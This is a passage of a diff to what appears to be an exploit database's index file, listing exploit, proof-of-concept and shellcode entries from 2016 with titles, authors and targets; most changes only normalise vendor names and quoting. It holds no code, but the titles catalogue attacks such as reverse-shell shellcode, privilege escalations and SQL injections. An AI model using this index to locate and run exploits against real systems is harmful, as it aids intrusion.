Research",osx,dos,0 +39929,platforms/multiple/dos/39929.c,"Apple Mac OS X / iOS - Kernel UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient",2016-06-10,"Google Security Research",multiple,dos,0 +39930,platforms/osx/dos/39930.c,"Apple Mac OS X - Kernel Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",php,webapps,80 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80 -39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - .m3u Exploit (Universal DEP + ASLR Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0 +39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 @@ -36149,7 +36152,7 @@ id,file,description,date,author,platform,type,port 39943,platforms/linux/dos/39943.txt,"Foxit PDF Reader 1.0.1.0925 - kdu_core::kdu_codestream::get_subsampling Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39944,platforms/linux/dos/39944.txt,"Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption",2016-06-13,"Google Security Research",linux,dos,0 39945,platforms/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution",2016-06-14,Metasploit,linux,remote,8080 -39946,platforms/php/webapps/39946.php,"Wordpress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80 +39946,platforms/php/webapps/39946.php,"WordPress Social Stream Plugin 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,php,webapps,80 39947,platforms/windows/dos/39947.py,"Oracle Orakill.exe 11.2.0 - Buffer Overflow",2016-06-14,hyp3rlinx,windows,dos,0 39948,platforms/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Persistent Cross-Site Scripting",2016-06-15,HaHwul,php,webapps,80 39949,platforms/php/webapps/39949.html,"Ultrabenosaurus ChatBoard - Cross-Site Request Forgery (Send Message)",2016-06-15,HaHwul,php,webapps,80 @@ -36162,18 +36165,18 @@ id,file,description,date,author,platform,type,port 39956,platforms/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,php,webapps,80 39957,platforms/php/webapps/39957.py,"PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",php,webapps,80 39958,platforms/linux/remote/39958.rb,"Bomgar Remote Support - Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443 -39959,platforms/windows/dos/39959.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0 -39960,platforms/windows/dos/39960.txt,"Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0 +39959,platforms/windows/dos/39959.txt,"Microsoft Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (1)",2016-06-15,"Nils Sommer",windows,dos,0 +39960,platforms/windows/dos/39960.txt,"Microsoft Windows 7 - win32k Bitmap Use-After-Free (MS16-062) (2)",2016-06-15,"Nils Sommer",windows,dos,0 39961,platforms/linux/dos/39961.txt,"Google Chrome - GPU Process MailboxManagerImpl Double-Read",2016-06-15,"Google Security Research",linux,dos,0 39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80 39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80 -39969,platforms/php/webapps/39969.php,"Wordpress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80 +39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80 39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",php,webapps,80 39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (File Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80 39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80 39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443 -39974,platforms/php/webapps/39974.html,"Wordpress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 +39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80 40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0 39976,platforms/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,php,webapps,80 39977,platforms/php/webapps/39977.txt,"Joomla BT Media (com_bt_media) Component - SQL Injection",2016-06-20,"Persian Hack Team",php,webapps,80 @@ -36185,18 +36188,18 @@ id,file,description,date,author,platform,type,port 39983,platforms/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,php,webapps,80 39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - (0PatchServicex64.exe) Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0 39985,platforms/windows/remote/39985.rb,"DarkComet Server - Remote File Download Exploit (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604 -39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - .mp3 Crash (PoC)",2016-06-21,"Ilca Lucian",linux,dos,0 +39986,platforms/linux/dos/39986.py,"Banshee 2.6.2 - '.mp3' Crash (PoC)",2016-06-21,"Ilca Lucian",linux,dos,0 39987,platforms/php/webapps/39987.html,"IonizeCMS 1.0.8 - (Add Admin) Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80 39988,platforms/php/webapps/39988.html,"Yona CMS - (Add Admin) Cross-Site Request Forgery",2016-06-21,s0nk3y,php,webapps,80 39989,platforms/php/webapps/39989.txt,"Joomla Publisher Pro (com_publisher) Component - SQL Injection",2016-06-21,s0nk3y,php,webapps,80 -39990,platforms/windows/dos/39990.txt,"Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 -39991,platforms/windows/dos/39991.txt,"Windows Kernel - ATMFD.dll NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 +39990,platforms/windows/dos/39990.txt,"Microsoft Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 +39991,platforms/windows/dos/39991.txt,"Microsoft Windows - Kernel ATMFD.dll NamedEscape 0x250C Pool Corruption (MS16-074)",2016-06-21,"Google Security Research",windows,dos,0 39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0 -39993,platforms/win_x86/dos/39993.txt,"Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",win_x86,dos,0 +39993,platforms/win_x86/dos/39993.txt,"Microsoft Windows - Custom Font Disable Policy Bypass",2016-06-21,"Google Security Research",win_x86,dos,0 39994,platforms/windows/dos/39994.html,"Microsoft Internet Explorer 11 - Garbage Collector Attribute Type Confusion (MS16-063)",2016-06-21,Skylined,windows,dos,0 39995,platforms/java/webapps/39995.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - ctcprotocol Servlet XXE",2016-06-21,ERPScan,java,webapps,0 39996,platforms/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,java,webapps,0 -39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Mutiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80 +39997,platforms/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",ruby,webapps,80 39998,platforms/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",php,webapps,80 40111,platforms/php/webapps/40111.txt,"Joomla Guru Pro (com_guru) Component - SQL Injection",2016-07-14,s0nk3y,php,webapps,80 39999,platforms/win_x86-64/remote/39999.rb,"PCMAN FTP 2.0.7 - ls Command Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21 @@ -36206,13 +36209,13 @@ id,file,description,date,author,platform,type,port 40009,platforms/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,php,webapps,80 40010,platforms/php/webapps/40010.html,"XuezhuLi FileSharing - (Add User) Cross-Site Request Forgery",2016-06-23,HaHwul,php,webapps,80 40011,platforms/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,php,webapps,80 -40012,platforms/php/webapps/40012.txt,"Wordpress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80 +40012,platforms/php/webapps/40012.txt,"WordPress Ultimate Product Catalog Plugin 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",php,webapps,80 40013,platforms/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,php,webapps,80 40014,platforms/hardware/dos/40014.txt,"Magnet Networks Tesley CPVA 642 Router - Weak WPA-PSK Passphrase Algorithm",2016-06-27,"Matt O'Connor",hardware,dos,0 -40015,platforms/php/webapps/40015.txt,"Codoforum 3.4 - Persistent Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80 +40015,platforms/php/webapps/40015.txt,"CodoForum 3.4 - Persistent Cross-Site Scripting",2016-06-27,"Ahmed Sherif",php,webapps,80 40016,platforms/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,hardware,webapps,80 40332,platforms/hardware/webapps/40332.py,"Belkin F9K1122v1 1.00.30 - Buffer Overflow (via Cross-Site Request Forgery)",2016-09-04,b1ack0wl,hardware,webapps,0 -40017,platforms/windows/local/40017.py,"MediaCoder 0.8.43.5830 - .m3u Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0 +40017,platforms/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0 40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - '.m3u' Buffer Overflow (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0 40019,platforms/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,php,webapps,80 40020,platforms/windows/local/40020.txt,"Panda Security Multiple Products - Privilege Escalation",2016-06-27,Security-Assessment.com,windows,local,0 @@ -36226,27 +36229,27 @@ id,file,description,date,author,platform,type,port 40028,platforms/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,php,webapps,443 40029,platforms/lin_x86-64/shellcode/40029.c,"Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",lin_x86-64,shellcode,0 40030,platforms/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - execEvil() Command Injection",2016-06-28,"Matt Bush",json,webapps,80 -40031,platforms/multiple/dos/40031.txt,"Symantec Antivirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0 -40032,platforms/multiple/dos/40032.txt,"Symantec Antivirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0 -40034,platforms/multiple/dos/40034.txt,"Symantec Antivirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0 -40035,platforms/multiple/dos/40035.txt,"Symantec Antivirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0 -40036,platforms/multiple/dos/40036.txt,"Symantec Antivirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0 -40037,platforms/multiple/dos/40037.txt,"Symantec Antivirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 +40031,platforms/multiple/dos/40031.txt,"Symantec AntiVirus - Multiple Remote Memory Corruption Unpacking RAR",2016-06-29,"Google Security Research",multiple,dos,0 +40032,platforms/multiple/dos/40032.txt,"Symantec AntiVirus - Remote Stack Buffer Overflow in dec2lha Library",2016-06-29,"Google Security Research",multiple,dos,0 +40034,platforms/multiple/dos/40034.txt,"Symantec AntiVirus - Heap Overflow Modifying MIME Messages",2016-06-29,"Google Security Research",multiple,dos,0 +40035,platforms/multiple/dos/40035.txt,"Symantec AntiVirus - Integer Overflow in TNEF Decoder",2016-06-29,"Google Security Research",multiple,dos,0 +40036,platforms/multiple/dos/40036.txt,"Symantec AntiVirus - Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink",2016-06-29,"Google Security Research",multiple,dos,0 +40037,platforms/multiple/dos/40037.txt,"Symantec AntiVirus - PowerPoint Misaligned Stream-cache Remote Stack Buffer Overflow",2016-06-29,"Google Security Research",multiple,dos,0 40038,platforms/windows/dos/40038.py,"Core FTP LE 2.2 - Path Field Local Buffer Overflow",2016-06-29,Netfairy,windows,dos,0 -40039,platforms/win_x86/local/40039.cpp,"Windows 7 SP1 x86 - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0 -40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution Exploit",2016-06-29,Cr4sh,windows,local,0 +40039,platforms/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0 +40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,windows,local,0 40041,platforms/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,php,webapps,8445 -40042,platforms/php/webapps/40042.php,"Wordpress Ultimate Membership Pro Plugin 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80 +40042,platforms/php/webapps/40042.php,"WordPress Ultimate Membership Pro Plugin 3.3 - SQL Injection",2016-06-29,wp0Day.com,php,webapps,80 40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0 40044,platforms/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Cross-Site Request Forgery to Remote Command Execution",2016-06-29,KoreLogic,cgi,webapps,443 40045,platforms/php/webapps/40045.txt,"Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion",2016-06-29,"Egidio Romano",php,webapps,80 40092,platforms/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 40093,platforms/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",php,webapps,80 -40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - netfilter target_offset OOB Privilege Escalation",2016-07-03,vnik,linux,local,0 +40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset OOB Privilege Escalation",2016-07-03,vnik,linux,local,0 40050,platforms/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution Cross-Site Request Forgery",2016-07-04,LiquidWorm,jsp,webapps,30303 40051,platforms/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",php,webapps,80 40052,platforms/lin_x86-64/shellcode/40052.c,"Linux/x86-64 - NetCat Bind Shell Shellcode (64 bytes)",2016-07-04,Kyzer,lin_x86-64,shellcode,0 -40055,platforms/php/webapps/40055.py,"Wordpress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80 +40055,platforms/php/webapps/40055.py,"WordPress Real3D FlipBook Plugin - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",php,webapps,80 40056,platforms/lin_x86/shellcode/40056.c,"Linux/x86 - Bind Shell Port 4444/TCP Shellcode (98 bytes)",2016-07-04,sajith,lin_x86,shellcode,0 40057,platforms/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,php,webapps,80 40058,platforms/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",php,webapps,80 @@ -36260,7 +36263,7 @@ id,file,description,date,author,platform,type,port 40067,platforms/linux/remote/40067.rb,"Nagios XI Chained - Remote Code Execution",2016-07-06,Metasploit,linux,remote,80 40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80 40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0 -40070,platforms/php/webapps/40070.txt,"Wordpress Lazy Content Slider Plugin 3.4 - (Add Catetory) Cross-Site Request Forgery",2016-07-08,"Persian Hack Team",php,webapps,80 +40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) Cross-Site Request Forgery",2016-07-08,"Persian Hack Team",php,webapps,80 40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0 40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0 40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash (PoC)",2016-07-08,hyp3rlinx,windows,dos,0 @@ -36271,7 +36274,7 @@ id,file,description,date,author,platform,type,port 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0 -40107,platforms/windows/local/40107.rb,"Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0 +40107,platforms/windows/local/40107.rb,"Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0 40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution",2016-07-13,Metasploit,linux,remote,443 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0 40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0 @@ -36279,8 +36282,8 @@ id,file,description,date,author,platform,type,port 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80 40145,platforms/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Privilege Escalation",2016-07-25,LiquidWorm,windows,local,0 40113,platforms/linux/remote/40113.txt,"OpenSSHD 7.2p2 - User Enumeration",2016-07-18,"Eddie Harari",linux,remote,22 -40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Post-Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 -40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Post-Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 +40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Post-Authentication Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 +40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Post-Authentication SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0 40118,platforms/windows/local/40118.txt,"Microsoft Internet Explorer 11 (Windows 10) - VBScript Memory Corruption Proof-of-Concept Exploit (MS16-051)",2016-06-22,"Brian Pak",windows,local,0 40119,platforms/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote,0 40120,platforms/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote,0 @@ -36302,19 +36305,19 @@ id,file,description,date,author,platform,type,port 40134,platforms/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Add Advanced Admin Cross-Site Request Forgery",2016-07-20,LiquidWorm,multiple,webapps,8088 40135,platforms/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting",2016-07-20,LiquidWorm,multiple,webapps,8088 40136,platforms/linux/remote/40136.py,"OpenSSHD 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 -40137,platforms/php/webapps/40137.html,"Wordpress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 +40137,platforms/php/webapps/40137.html,"WordPress Video Player Plugin 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",php,webapps,80 40138,platforms/windows/remote/40138.py,"TFTP Server 1.4 - WRQ Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 40139,platforms/lin_x86-64/shellcode/40139.c,"Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)",2016-07-21,Kyzer,lin_x86-64,shellcode,0 40140,platforms/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",php,webapps,80 40141,platforms/bsd/local/40141.c,"mail.local(8) (NetBSD) - Privilege Escalation (NetBSD-SA2016-006)",2016-07-21,akat1,bsd,local,0 40142,platforms/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - openssl_seal() Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote,0 -40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution Exploit (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0 +40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0 40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 -40148,platforms/windows/local/40148.py,"MediaCoder 0.8.43.5852 - .m3u SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 +40148,platforms/windows/local/40148.py,"Mediacoder 0.8.43.5852 - '.m3u' SEH Exploit",2016-07-25,"Karn Ganeshen",windows,local,0 40149,platforms/php/webapps/40149.rb,"Drupal CODER Module 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",php,webapps,80 40150,platforms/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",php,webapps,80 -40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - .m3u Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 +40151,platforms/windows/local/40151.py,"CoolPlayer+ Portable 2.19.6 - '.m3u' Stack Overflow (Egghunter + ASLR Bypass)",2016-07-25,"Karn Ganeshen",windows,local,0 40153,platforms/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,php,webapps,80 40154,platforms/php/webapps/40154.txt,"PHP gettext 1.0.12 - (gettext.php) Unauthenticated Code Execution",2016-07-25,kmkz,php,webapps,0 40155,platforms/php/dos/40155.py,"PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",php,dos,80 @@ -36324,7 +36327,7 @@ id,file,description,date,author,platform,type,port 40159,platforms/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",hardware,webapps,80 40160,platforms/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",hardware,webapps,0 40161,platforms/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421_ Filr 1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",java,webapps,9443 -40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authenticated Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 +40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 40164,platforms/multiple/local/40164.c,"VMware Virtual Machine Communication Interface (VMCI) vmci.sys - (PoC)",2013-03-06,"Artem Shishkin",multiple,local,0 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 @@ -36334,18 +36337,18 @@ id,file,description,date,author,platform,type,port 40170,platforms/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0 40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0 -40174,platforms/php/webapps/40174.txt,"Wordpress Ultimate Product Catalog 3.9.8 Plugin - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 +40174,platforms/php/webapps/40174.txt,"WordPress Ultimate Product Catalog 3.9.8 Plugin - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 40175,platforms/win_x86/shellcode/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",win_x86,shellcode,0 -40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authenticated Remote Root Exploit (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 -40177,platforms/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Post-Authenticated Remote Root Exploit (Metasploit)",2016-07-29,xort,linux,remote,8000 +40176,platforms/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Post-Authentication Remote Root Exploit (Metasploit) 